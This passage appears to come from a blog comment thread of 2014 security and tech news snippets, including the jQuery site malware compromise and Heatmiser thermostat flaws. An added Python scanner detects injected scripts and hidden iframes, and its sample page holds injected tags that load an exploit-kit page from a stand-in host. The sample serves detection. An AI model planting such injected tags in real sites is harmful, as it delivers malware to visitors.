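def verify_block(prev_hash: bytes, merkle_root: bytes, nonce: int, difficulty_bits: int) -> bool:
    """Anyone can check a claimed solution with a single hash."""
    return meets_target(sha256d(header_bytes(prev_hash, merkle_root, nonce)), difficulty_bits)


if __name__ == "__main__":
    for bits in (8, 12, 16):
        nonce, block_hash = mine(SAMPLE_PREV_HASH, SAMPLE_MERKLE_ROOT, bits)
        print(f"{bits:2d} bits: nonce={nonce:7d} hash={block_hash.hex()}")
```

Running the block with 8, 12 and 16 difficulty bits makes the scaling visible: the nonce found grows by roughly a factor of 16 per step, while `verify_block` costs the same single hash regardless of difficulty. Real Bitcoin difficulty is set so that the whole network needs about ten minutes per block, which is the computational effort the article refers to.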
  42. Tomi Engdahl says:

    Netflix refuses CRTC demand to hand over subscriber data
    Video streaming company not ‘in a position to produce competitively sensitive information’
    http://www.cbc.ca/news/business/netflix-refuses-crtc-demand-to-hand-over-subscriber-data-1.2774921

    Netflix says it won’t turn over confidential subscriber information to Canada’s broadcast regulator in order to safeguard private corporate information.

    The video streaming company was ordered last week to give the data to the Canadian Radio-television and Telecommunications Commission by Monday, along with information related to the Canadian content it creates or provides to subscribers.

    A Netflix official said Tuesday that while the company has responded to a number of CRTC requests, it is not “in a position to produce the confidential and competitively sensitive information.”

  43. Tomi Engdahl says:

    Securing Trustworthy & Resilient Chips
    NSF and SRC team to make chips counterfeit- and hack-free
    http://www.eetimes.com/document.asp?doc_id=1324043&

    Nine universities, from a field of more than 50 applicants, have been chosen to receive $4 million over three years to develop Secure, Trustworthy, Assured, and Resilient Semiconductors and Systems. The STARSS program is supported by the National Science Foundation (NSF) and the Semiconductor Research Corporation (SRC) as well as SRC member companies Intel, Freescale, and Mentor Graphics.

    The STARSS program is part of a $75 million cyber security effort by the NSF, but is unique in that it is aimed at making the chips themselves — especially processors — immune from being exploited by hackers who take advantage of hidden Trojan horses and backdoors that are intentionally or unintentionally inserted into chips by intellectual property (IP) often from foreign sources. The effort will also make it easier to spot counterfeit chips, chips having been tampered with somewhere along the supply chain, and used chips being passed off as new.

    “NSF and SRC are initially funding nine projects [listed below] with $4 million in a multi-phase project that will likely spend $10 million over several years,”

  44. Tomi Engdahl says:

    “Shocking” Android browser bug could be a “privacy disaster”: here’s how to fix it
    http://nakedsecurity.sophos.com/2014/09/16/shocking-android-browser-bug-could-be-a-privacy-disaster-heres-how-to-fix-it/

    Independent security researcher Rafay Baloch has written about a security bug in the Android Browser app that allows one website to steal data from another.

    The guys over at Metasploit are calling it a “Privacy Disaster,”

    What to do?

    Stop using Browser if you have it installed.

    You almost certainly can’t uninstall it, because it’s usually part of the operating system build itself, meaning it doesn’t show up under Settings | Apps | Downloaded.

    But if you tap on Browser from the All apps page, you should see a [Disable] button

    This will let you disarm the danger by preventing you from using the risky Browser app again.

    Well-known replacement browsers include Firefox, Chrome and Dolphin.

  45. Tomi Engdahl says:

    jQuery site popped to serve malware slop
    Visited September 18? Time to REFORMAT.
    http://www.theregister.co.uk/2014/09/24/jquery_site_popped_to_serve_malware_slop/

    The jQuery site served credential-stealing malware to scores of users who visited the website on September 18, researcher James Pleger says.

    The super-popular JavaScript library was used by 30 percent of websites including 70 percent of the 10,000 most popular sites which may have been compromised by the RIG exploit kit.

    jQuery security bods found no evidence that its site was foisting the drive-by download however.

    Pleger said the malware did not affect jQuery itself but did infect the website and urged those who visited the site during the alleged attack to re-image their machines.

    “However, discovering information-stealing malware on jQuery.com is particularly disconcerting because of the demographic of jQuery users [who are] generally IT systems administrators and web developers, including a large contingent who work within enterprises,” he said.

    The Risk IQ research director found the compromise during a website scan and found a malicious script tag was delivering Rig through an invisible iframe.

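The compromise above was spotted during a website scan: a malicious script tag delivering the exploit kit through an invisible iframe. The following is an added example, not jQuery's or RiskIQ's code, of a minimal static check for exactly those two tell-tales: an iframe hidden by size or style, and a script tag loading from a host the site does not normally use (the allowlist `ALLOWED_HOSTS` and the sample page are constructed for the example). A real deployment would fetch the live page and diff it against a known-good copy; this only shows the detection logic.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Added example (not jQuery's or RiskIQ's code): flag an invisible iframe,
# a script tag pulling from an unexpected host, and an inline script that
# writes an iframe at runtime. The allowlist and the sample page are constructed.

ALLOWED_HOSTS = {"code.jquery.com", "jquery.com"}   # assumed allowlist for the sample site

HIDDEN_STYLE_HINTS = ("display:none", "visibility:hidden", "width:0", "height:0", "left:-")


class InjectionScanner(HTMLParser):
    """Collects (kind, detail) findings while parsing the page."""

    def __init__(self, allowed_hosts):
        super().__init__()
        self.allowed_hosts = {h.lower() for h in allowed_hosts}
        self.findings = []
        self._script_buf = None      # collects inline script text between <script> and </script>

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "iframe":
            self._check_iframe(a)
        elif tag == "script":
            self._check_script_src(a.get("src", ""))
            self._script_buf = []

    def handle_data(self, data):
        if self._script_buf is not None:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script_buf is not None:
            body = "".join(self._script_buf).lower()
            # Drive-by kits often have a script write the iframe at runtime so
            # it never appears as a literal tag in the served HTML.
            if "document.write" in body and "<iframe" in body:
                self.findings.append(("script-writes-iframe", body[:80]))
            self._script_buf = None

    def _check_iframe(self, a):
        style = a.get("style", "").replace(" ", "").lower()
        tiny = a.get("width", "").strip() in ("0", "1") or a.get("height", "").strip() in ("0", "1")
        if tiny or any(hint in style for hint in HIDDEN_STYLE_HINTS):
            self.findings.append(("hidden-iframe", a.get("src", "")))

    def _check_script_src(self, src):
        # urlparse handles absolute and protocol-relative (//host/...) URLs;
        # relative paths have no host and are left alone.
        host = (urlparse(src).hostname or "").lower()
        if host and host not in self.allowed_hosts:
            self.findings.append(("foreign-script", src))


def scan_html(html, allowed_hosts=ALLOWED_HOSTS):
    """Return the list of (kind, detail) findings for one HTML document."""
    scanner = InjectionScanner(allowed_hosts)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: a normal page with an injected block appended to <head> and <body>.
SAMPLE_PAGE = """<html><head>
<script src="/jquery-2.1.1.min.js"></script>
<script src="//code.jquery.com/jquery-1.11.1.min.js"></script>
<script src="http://cdn-static-assets.example/s.js"></script>
<script>document.write('<iframe src="http://landing.example/rig.php" width=1 height=1 style="display:none"></iframe>');</script>
</head><body>
<iframe src="http://landing.example/rig.php" style="position:absolute; left:-9999px; width:0; height:0"></iframe>
<iframe src="https://www.youtube.com/embed/abc" width="560" height="315"></iframe>
</body></html>"""

if __name__ == "__main__":
    for kind, detail in scan_html(SAMPLE_PAGE):
        print(f"{kind:22s} {detail}")
```

The scan is deliberately conservative: relative script paths and visible iframes produce no findings, so on a clean page the result is an empty list, which makes it usable as a periodic check against a site's own front page.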
  46. Tomi Engdahl says:

    Popular Wi-Fi Thermostat Full of Security Holes
    http://it.slashdot.org/story/14/09/24/014218/popular-wi-fi-thermostat-full-of-security-holes

    Heatmiser, a U.K.-based manufacturer of digital thermostats, is contacting its customers today about a series of security issues that could expose a Wi-Fi-connected version of its product to takeover. Andrew Tierney, a “reverse-engineer by night,” whose specialty is digging up bugs in embedded systems wrote on his blog, that he initially read about vulnerabilities in another one of the company’s products

  47. Tomi Engdahl says:

    Heatmiser digital thermostat users: For pity’s sake, DON’T SWITCH ON the WI-FI
    A stranger turns up YOUR heat with default password 1234
    http://www.theregister.co.uk/2014/09/24/heatmiser_digital_thermostat_insecure/

    Digital thermostats from Heatmiser are wide open to takeover thanks to default login credentials and myriad other security flaws.

    The UK-based manufacturer has promised to develop a fix. Pending the arrival of a patch, users are advised to disable the device’s Wi-Fi capability.

    The security flaws were discovered by Andrew Tierney, a reverse engineer who specialises in locating flaws in embedded computing kit. Tierney began probing for flaws in Heatmiser’s Wi-Fi-enabled thermostats after reading about problems in another (old and discontinued) Heatmiser product, NetMonitor.

    In response, Heatmiser has contacted its customers, acknowledging some of the problems and promising to improve the security of the devices.

    A security issue has been identified on our WiFi Thermostat… It has been identified that if certain steps are carried out, the username and password to your system can be obtained therefore allowing remote access of your system.

    We are working as quickly as possible to resolve this issue but in the meantime would ask that you remove the port forwarding to your WiFi Thermostat in your router. This means that remote web browser access won’t work but you will be able to use the SmartPhone App.

  48. Tomi Engdahl says:


    One whistleblower gets $30m in the bank, but others count the personal cost
    http://www.theguardian.com/money/2014/sep/23/whistleblower-bank-personal-cost-sec?utm_source=digg&utm_medium=email

    The SEC this week promised an overseas whistleblower $30m – but others who have uncovered wrongdoing haven’t been so lucky

    This week, the Securities and Exchange Commission made history by promising an anonymous overseas whistleblower a reward of $30m.

    It doesn’t usually work out that way for whistleblowers. Ringing the bell on abuse in a company or government usually means losing jobs and status. The norm is pariah treatment and low-wage jobs, as well as trips to the welfare office and the lingering threat of prosecution or intimidation.

    Drake, a former senior executive at the National Security Agency, is well known in national security circles. In 2006, he leaked information about the NSA’s Trailblazer project to the Baltimore Sun.

    Drake, unlike other NSA whistleblowers, has the freedom to move freely within any city or state in America. His freedom, however, comes with a very tangible price: his livelihood.

    President Obama has approved legislation to help protect federal whistleblowers against retaliation and economic ruin. In November 2012, Obama signed the Whistleblower Protection Enhancement Act into law, which extended whistleblower protections available to corporate whistleblowers to federal workers.

  49. Tomi Engdahl says:

    Emma Watson nude photo threats were apparently a plot to kill 4chan
    Site was a hoax orchestrated by viral marketing company
    http://www.theverge.com/2014/9/24/6837585/emma-watson-nude-photo-threats-were-hoax-anti-4chan-campaign

    Anonymous users of infamous web forum 4chan leaked stolen nude pictures of Jennifer Lawrence, Kate Upton, Kirsten Dunst, and scores of other women on September 1st. Three weeks later, anonymous 4chan users threatened to do it again. Their new target would be Emma Watson

    But when the clock struck 12, no naked pictures were released. Instead visitors to emmayouarenext.com were pointed to a marketing company’s homepage, its black background bearing a crossed-out version of 4chan’s four-leaf clover logo, and the hashtag #shutdown4chan written in large white letters. The site was a hoax, designed to draw as many eyes as possible not to actual pictures of Watson but to an apparent campaign set up to attack 4chan.

    “None of these women deserve this,” the page states. “Join us as we shutdown 4chan and prevent more pictures from being leaked.”

  50. Tomi Engdahl says:

    Sticking with the political climate, Brazier said the industry continued to face fallout from the Snowden disclosures last year, beyond the Chinese backlash. Data residency was driving the siting of data centres in Germany and Switzerland by the likes of Deutsche Telecom.

    However, he said much hung on the result of an appeal by Microsoft against a US court decision forcing the handing over of emails residing on a server in Dublin.

    Customer concern over the issue was having an undoubted impact on product design, Brazier continued, noting the inclusion of on device encryption in iOS 8. With Android not far behind, “there’s obviously been some talking,” he noted.

    This chimed in with the profile of security concerns: the number one issue for CIOs, according to Canalys’ research. For the channel, it was important to focus on security from the outset, as “it gets you beyond the IT department.”

    Source: http://www.channelregister.co.uk/2014/09/24/pc_resellers_bounce_back/

